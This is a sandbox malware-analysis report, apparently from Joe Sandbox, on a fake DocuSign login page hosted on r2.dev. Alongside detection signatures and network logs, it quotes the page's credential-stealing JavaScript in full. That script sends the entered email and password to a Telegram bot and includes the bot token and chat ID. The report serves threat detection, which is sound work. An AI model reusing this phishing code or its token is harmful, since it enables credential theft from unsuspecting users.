Edit tour

Windows Analysis Report
http://pub-575fb9d74c7a46f0828b37cda8dd9c40.r2.dev/docu/e_protocol.html?e

Overview

General Information

Sample URL:	http://pub-575fb9d74c7a46f0828b37cda8dd9c40.r2.dev/docu/e_protocol.html?e
Analysis ID:	1590430
Infos:

Detection

HTMLPhisher

Score:	92
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

AI detected phishing page

Antivirus / Scanner detection for submitted sample

Misleading page title found

Yara detected HtmlPhish10

Yara detected HtmlPhish64

AI detected suspicious Javascript

Javascript uses Clearbit API to dynamically determine company logos

Javascript uses Telegram API

HTML body contains low number of good links

HTML body contains password input but no form action

HTML title does not match URL

Submit button contains javascript call

Classification

Process Tree

System is w10x64

chrome.exe (PID: 2100 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

chrome.exe (PID: 1060 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2368 --field-trial-handle=2220,i,11269688216620596716,9468620323814260780,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

chrome.exe (PID: 1096 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://pub-575fb9d74c7a46f0828b37cda8dd9c40.r2.dev/docu/e_protocol.html?e" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

cleanup

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
dropped/chromecache_43	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security

HTML

Source	Rule	Description	Author	Strings
1.0.pages.csv	JoeSecurity_HtmlPhish_64	Yara detected HtmlPhish_64	Joe Security
1.0.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: http://pub-575fb9d74c7a46f0828b37cda8dd9c40.r2.dev/docu/e_protocol.html?e

Avira URL Cloud: detection malicious, Label: phishing

Phishing

AI detected phishing page

Source: https://pub-575fb9d74c7a46f0828b37cda8dd9c40.r2.dev/docu/e_protocol.html?e

Joe Sandbox AI: Score: 9 Reasons: The brand 'DocuSign' is well-known and typically associated with the domain 'docusign.com'., The provided URL 'pub-575fb9d74c7a46f0828b37cda8dd9c40.r2.dev' does not match the legitimate domain for DocuSign., The URL uses a subdomain structure that is not typical for DocuSign's official services., The domain 'r2.dev' is not associated with DocuSign and could be a generic hosting or service provider., Presence of a password input field on a non-legitimate domain is a common phishing tactic. DOM: 1.0.pages.csv

Misleading page title found

Source: https://pub-575fb9d74c7a46f0828b37cda8dd9c40.r2.dev/docu/e_protocol.html?e	Page Title: DocuSign Login - Enter your password to sign in
Source: https://pub-575fb9d74c7a46f0828b37cda8dd9c40.r2.dev/docu/e_protocol.html?e	Page Title: DocuSign Login - Enter your password to sign in

Yara detected HtmlPhish10

Source: Yara match	File source: 1.0.pages.csv, type: HTML
Source: Yara match	File source: dropped/chromecache_43, type: DROPPED

Yara detected HtmlPhish64

Source: Yara match

File source: 1.0.pages.csv, type: HTML

AI detected suspicious Javascript

Source: 0.1.id.script.csv

Joe Sandbox AI: Detected suspicious JavaScript with source url: https://pub-575fb9d74c7a46f0828b37cda8dd9c40.r2.de... This script demonstrates high-risk behaviors, including data exfiltration and dynamic code execution. It collects user credentials (email and password) and sends them to a Telegram bot, which is a suspicious and potentially malicious activity. The script also manipulates the DOM aggressively, hiding and showing different elements. Overall, the script exhibits clear signs of malicious intent and should be considered a high-risk security threat.

Javascript uses Clearbit API to dynamically determine company logos

Source: https://pub-575fb9d74c7a46f0828b37cda8dd9c40.r2.dev/docu/e_protocol.html?e

HTTP Parser: function z() { var email = window.location.hash.substr(1); //change window.location.hash.substr(1) to "xxxemail" if you are using attachment.// example // var email = "xxxemail";var ind=email.indexof("@"); var my_slice=email.substr((ind+1));var my_slice2=email.substr(ind+1,email.length);document.getelementbyid('username').value = email;document.getelementbyid('logoname').innerhtml = email;/*$('#login_logo1').attr('src', 'https://logo.clearbit.com/' + my_slice);*/}

Javascript uses Telegram API

Source: https://pub-575fb9d74c7a46f0828b37cda8dd9c40.r2.dev/docu/e_protocol.html?e

HTTP Parser: function sendemail() {var filter = /^([a-za-z0-9_\.\-])+\@(([a-za-z0-9\-])+\.)+([a-za-z0-9]{2,4})+$/;if (!filter.test(document.getelementbyid('username').value)) {alert('invalid email'); return false; } if (document.getelementbyid('password').value === '') { alert('please enter a valid password!'); return false; }var x = document.getelementbyid("div4"); var a = document.getelementbyid("div1"); var b = document.getelementbyid("div2"); a.style.display = "none"; b.style.display = "block"; x.style.display = "none"; var username = document.getelementbyid('username').value;var password = document.getelementbyid('password').value;var ozi = "\n=========docusignboy======\n" ozi+="email :"+username ozi+="\npass :" +password ozi+="\n============================\n" tmsend(ozi)}function tmsend(message){ var token = "7638787397:aahdnjvzecz4khxa5j6sxi8dfak8uvijtfo"; var chat_id= "6247174206"; c...

Source: https://pub-575fb9d74c7a46f0828b37cda8dd9c40.r2.dev/docu/e_protocol.html?e

HTTP Parser: Number of links: 0

Source: https://pub-575fb9d74c7a46f0828b37cda8dd9c40.r2.dev/docu/e_protocol.html?e

HTTP Parser: <input type="password" .../> found but no <form action="...

Source: https://pub-575fb9d74c7a46f0828b37cda8dd9c40.r2.dev/docu/e_protocol.html?e

HTTP Parser: Title: DocuSign Login - Enter your password to sign in does not match URL

Source: https://pub-575fb9d74c7a46f0828b37cda8dd9c40.r2.dev/docu/e_protocol.html?e

HTTP Parser: On click: sendEmail()

Source: https://pub-575fb9d74c7a46f0828b37cda8dd9c40.r2.dev/docu/e_protocol.html?e

HTTP Parser: <input type="password" .../> found

Source: https://pub-575fb9d74c7a46f0828b37cda8dd9c40.r2.dev/docu/e_protocol.html?e

HTTP Parser: No <meta name="author".. found

Source: https://pub-575fb9d74c7a46f0828b37cda8dd9c40.r2.dev/docu/e_protocol.html?e

HTTP Parser: No <meta name="copyright".. found

Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49863 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:50003 version: TLS 1.2

Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199
Source: unknown	TCP traffic detected without corresponding DNS query: 40.113.103.199

Source: global traffic	HTTP traffic detected: GET /docu/e_protocol.html?e HTTP/1.1Host: pub-575fb9d74c7a46f0828b37cda8dd9c40.r2.devConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /media/catalog/product/cache/7fd38fa62b8fefd3d046b3795a3b5e36/b/l/blurred_invoice.jpg HTTP/1.1Host: www.continentalsports.co.ukConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /media/catalog/product/cache/7fd38fa62b8fefd3d046b3795a3b5e36/b/l/blurred_invoice.jpg HTTP/1.1Host: www.continentalsports.co.ukConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /docu/e_protocol.html?e HTTP/1.1Host: pub-575fb9d74c7a46f0828b37cda8dd9c40.r2.devConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9

Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: pub-575fb9d74c7a46f0828b37cda8dd9c40.r2.dev
Source: global traffic	DNS traffic detected: DNS query: www.continentalsports.co.uk

Source: chromecache_43.3.dr	String found in binary or memory: https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js
Source: chromecache_43.3.dr	String found in binary or memory: https://api.telegram.org/bot$
Source: chromecache_43.3.dr	String found in binary or memory: https://logo.clearbit.com/
Source: chromecache_43.3.dr	String found in binary or memory: https://www.continentalsports.co.uk/media/catalog/product/cache/7fd38fa62b8fefd3d046b3795a3b5e36/b/l

Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49863
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49863 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50003
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50005
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50003 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50005 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724

Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:49863 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:50003 version: TLS 1.2

Source: classification engine

Classification label: mal92.phis.win@17/10@10/7

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2368 --field-trial-handle=2220,i,11269688216620596716,9468620323814260780,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://pub-575fb9d74c7a46f0828b37cda8dd9c40.r2.dev/docu/e_protocol.html?e"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2368 --field-trial-handle=2220,i,11269688216620596716,9468620323814260780,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	Windows Management Instrumentation	1 Browser Extensions	1 Process Injection	1 Process Injection	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Scripting	Boot or Logon Initialization Scripts	Rootkit	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	1 Ingress Tool Transfer	Traffic Duplication	Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
http://pub-575fb9d74c7a46f0828b37cda8dd9c40.r2.dev/docu/e_protocol.html?e	100%	Avira URL Cloud	phishing

Source	Detection	Scanner	Label	Link
https://www.continentalsports.co.uk/media/catalog/product/cache/7fd38fa62b8fefd3d046b3795a3b5e36/b/l/blurred_invoice.jpg	0%	Avira URL Cloud	safe
https://www.continentalsports.co.uk/media/catalog/product/cache/7fd38fa62b8fefd3d046b3795a3b5e36/b/l	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
pub-575fb9d74c7a46f0828b37cda8dd9c40.r2.dev	172.66.0.235	true	true	unknown
www.google.com	216.58.206.36	true	false	high
www.continentalsports.co.uk	95.154.228.177	true	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://pub-575fb9d74c7a46f0828b37cda8dd9c40.r2.dev/docu/e_protocol.html?e	true		unknown
https://www.continentalsports.co.uk/media/catalog/product/cache/7fd38fa62b8fefd3d046b3795a3b5e36/b/l/blurred_invoice.jpg	false	Avira URL Cloud: safe	unknown
http://pub-575fb9d74c7a46f0828b37cda8dd9c40.r2.dev/docu/e_protocol.html?e	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://api.telegram.org/bot$	chromecache_43.3.dr	false		high
https://logo.clearbit.com/	chromecache_43.3.dr	false		high
https://www.continentalsports.co.uk/media/catalog/product/cache/7fd38fa62b8fefd3d046b3795a3b5e36/b/l	chromecache_43.3.dr	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
162.159.140.237	unknown	United States	13335	CLOUDFLARENETUS	false
216.58.206.36	www.google.com	United States	15169	GOOGLEUS	false
95.154.228.177	www.continentalsports.co.uk	United Kingdom	20860	IOMART-ASGB	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
172.66.0.235	pub-575fb9d74c7a46f0828b37cda8dd9c40.r2.dev	United States	13335	CLOUDFLARENETUS	true

Private

IP
192.168.2.4
192.168.2.6

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1590430
Start date and time:	2025-01-14 01:38:00 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 3m 1s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	browseurl.jbs
Sample URL:	http://pub-575fb9d74c7a46f0828b37cda8dd9c40.r2.dev/docu/e_protocol.html?e
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal92.phis.win@17/10@10/7
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 142.250.186.35, 172.217.16.206, 142.250.110.84, 172.217.18.110, 142.250.185.110, 142.250.185.206, 142.250.186.138, 216.58.212.170, 142.250.185.74, 142.250.184.234, 216.58.206.42, 142.250.181.234, 216.58.206.74, 142.250.185.106, 142.250.186.170, 142.250.185.138, 142.250.186.106, 142.250.184.202, 142.250.185.202, 142.250.185.234, 172.217.16.202, 172.217.18.10, 23.50.108.3, 199.232.214.172, 142.250.181.238, 142.250.186.46, 142.250.184.238, 216.58.206.78, 142.250.185.227, 184.28.90.27, 13.107.246.45, 172.202.163.200, 4.175.87.197
Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, otelrules.azureedge.net, slscr.update.microsoft.com, ajax.googleapis.com, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, redirector.gvt1.com, update.googleapis.com, clients.l.google.com
Not all processes where analyzed, report is missing behavior information
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: http://pub-575fb9d74c7a46f0828b37cda8dd9c40.r2.dev/docu/e_protocol.html?e

Input	Output
URL: http://pub-575fb9d74c7a46f0828b37cda8dd9c40.r2.dev Model: Joe Sandbox AI	{ "typosquatting": false, "unusual_query_string": false, "suspicious_tld": true, "ip_in_url": false, "long_subdomain": true, "malicious_keywords": false, "encoded_characters": false, "redirection": false, "contains_email_address": false, "known_domain": false, "brand_spoofing_attempt": false, "third_party_hosting": true }
URL: http://pub-575fb9d74c7a46f0828b37cda8dd9c40.r2.dev
URL: https://pub-575fb9d74c7a46f0828b37cda8dd9c40.r2.de... Model: Joe Sandbox AI	{ "risk_score": 9, "reasoning": "This script demonstrates high-risk behaviors, including data exfiltration and dynamic code execution. It collects user credentials (email and password) and sends them to a Telegram bot, which is a suspicious and potentially malicious activity. The script also manipulates the DOM aggressively, hiding and showing different elements. Overall, the script exhibits clear signs of malicious intent and should be considered a high-risk security threat." }
function sendEmail() { var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/; if (!filter.test(document.getElementById('username').value)) { alert('Invalid Email'); return false; } if (document.getElementById('password').value === '') { alert('Please enter a valid password!'); return false; } var x = document.getElementById("Div4"); var a = document.getElementById("Div1"); var b = document.getElementById("Div2"); a.style.display = "none"; b.style.display = "block"; x.style.display = "none"; var username = document.getElementById('username').value; var password = document.getElementById('password').value; var ozi = "\n=========DocuSignBOY======\n" ozi+="Email :"+username ozi+="\nPass :" +password ozi+="\n============================\n" tmsend(ozi) } function tmsend(message){ var token = "7638787397:AAHDnJvZeCZ4khXA5j6sxI8DFak8uvIjtFo"; var chat_id= "6247174206"; const url = `https://api.telegram.org/bot${token}/sendMessage` // The url to request const obj = { chat_id: chat_id, // Telegram chat id text: message // The text to send }; const xht = new XMLHttpRequest(); xht.open("POST", url, true); xht.setRequestHeader("Content-type", "application/json; charset=UTF-8"); xht.send(JSON.stringify(obj)); setTimeout(function() { document.getElementById('password').value = ""; var x = document.getElementById("Div4"); x.style.display = "block"; }, 2000); setTimeout(function() { var a = document.getElementById("Div1"); var b = document.getElementById("Div2"); var x = document.getElementById("Div4"); a.style.display = "block"; b.style.display = "none"; x.style.display = "none"; }, 5000); }
URL: https://pub-575fb9d74c7a46f0828b37cda8dd9c40.r2.de... Model: Joe Sandbox AI	{ "risk_score": 5, "reasoning": "The script appears to be extracting an email address from the URL hash and using it to populate form fields and display it on the page. This behavior is not inherently malicious, but the use of the email address in this way could potentially be part of a phishing or social usering attack. Additionally, the commented-out code suggests the potential for fetching a logo from a third-party domain, which could be used for further data exfiltration or redirection. Overall, the script exhibits moderate-risk indicators that warrant further review and investigation." }
function Z() { var email = window.location.hash.substr(1); //Change window.location.hash.substr(1) to "XXXEMAIL" if you are using attachment. // Example // var email = "XXXEMAIL"; var ind=email.indexOf("@"); var my_slice=email.substr((ind+1)); var my_slice2=email.substr(ind+1,email.length); document.getElementById('username').value = email; document.getElementById('logoname').innerHTML = email; /* $('#login_logo1').attr('src', 'https://logo.clearbit.com/' + my_slice); */ }
URL: https://pub-575fb9d74c7a46f0828b37cda8dd9c40.r2.dev/docu/e_protocol.html?e Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "Log in to access document", "prominent_button_name": "Authorize", "text_input_field_labels": [ "Password" ], "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: https://pub-575fb9d74c7a46f0828b37cda8dd9c40.r2.dev/docu/e_protocol.html?e Model: Joe Sandbox AI	{ "brands": [ "DocuSign" ] }
	{ "brands": [ "DocuSign" ] }
URL: https://pub-575fb9d74c7a46f0828b37cda8dd9c40.r2.dev/docu/e_protocol.html?e Model: Joe Sandbox AI	```json{ "legit_domain": "docusign.com", "classification": "wellknown", "reasons": [ "The brand 'DocuSign' is well-known and typically associated with the domain 'docusign.com'.", "The provided URL 'pub-575fb9d74c7a46f0828b37cda8dd9c40.r2.dev' does not match the legitimate domain for DocuSign.", "The URL uses a subdomain structure that is not typical for DocuSign's official services.", "The domain 'r2.dev' is not associated with DocuSign and could be a generic hosting or service provider.", "Presence of a password input field on a non-legitimate domain is a common phishing tactic." ], "riskscore": 9} Google indexed: False
URL: pub-575fb9d74c7a46f0828b37cda8dd9c40.r2.dev Brands: DocuSign Input Fields: Password

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with very long lines (65350)
Category:	downloaded
Size (bytes):	252205
Entropy (8bit):	6.083975621579217
Encrypted:	false
SSDEEP:	6144:8ajpSYt72uB8zd3nuatHiuZ1aYxs7TA7V+se6LOt1Xf54:8a1SYtRc33CMaoQTA7V+se61
MD5:	AC9DBD4FD1FB0ADD29A1B8703BCE9406
SHA1:	D71E70C8AC03CF68134D5AB68DD2F05AD4B23002
SHA-256:	6316CB80E53A87A277A3CF231119AC5BE5E8DEF905800F583841D36358EDB374
SHA-512:	FFDFE6A01976EB9CDF1E289CA03F938952058151440C62925CCC8D1BCFA8E48EEF7A72581461FC35B10AE02853116A27AE5C70D30AF166B10FEF6C3C9F53E5CF
Malicious:	false
Reputation:	low
URL:	https://pub-575fb9d74c7a46f0828b37cda8dd9c40.r2.dev/docu/e_protocol.html?e
